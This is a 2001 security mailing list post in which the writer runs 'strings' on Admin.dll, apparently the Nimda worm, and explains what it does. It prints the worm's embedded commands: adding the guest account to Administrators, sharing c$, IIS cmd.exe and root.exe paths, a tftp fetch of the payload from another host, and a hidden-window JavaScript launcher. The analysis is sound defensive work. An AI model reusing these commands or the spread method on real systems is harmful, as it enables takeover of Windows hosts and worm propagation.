Vulnerability Development mailing list archives
Admin.dll (strings ./Admin.dll)
From: "w1re p4ir" <w1rep4ir () disinfo net>
Date: 18 Sep 2001 17:52:34 -0000
Ok folks here's what i've come up with when running strings against Admin.dll, I'm by no means a forensics specialist,
but here is what i have concluded.
I'm sure some of this might be totally off but it is what I think it's attempting to do:
First I noticed it setting up:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
It then shows the mime headers and the content type:
Content-Type: audio/x-wav;
name="readme.exe"
This is obviously part of the readme.eml. Next we see it making some changes or reading of the registry:
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
It also seems to add the user "guest" to the Administrator group.
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
After this we notice the binary directories and unicode character sets to be used in compromising the other hosts.
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
This is an interesting part it must be net using to the localmachine(maybe) with the user guest (who is now an
administrator) and tftping the Admin.dll and putting it in the current directory and all Drive Roots C:, D: ect.
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>
/Admin.dll
Here's where it inserts the javascript to open the evil readme.eml mime Buffer overflow.
This im' not too sure of what its trying to do. I imagine it's setting up the email information:
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
________________________________________________________
The Best News Source On The Web - http://www.disinfo.com
Current thread:
- Admin.dll (strings ./Admin.dll) w1re p4ir (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) Robert D. (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) Gary Flynn (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) Gary Flynn (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) TJ Jablonowski (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) Gary Flynn (Sep 18)
- <Possible follow-ups>
- RE: Admin.dll (strings ./Admin.dll) Isherwood Jeff C Contr AFRL/IFOSS (Sep 18)
- Re: Admin.dll (strings ./Admin.dll) Robert D. (Sep 18)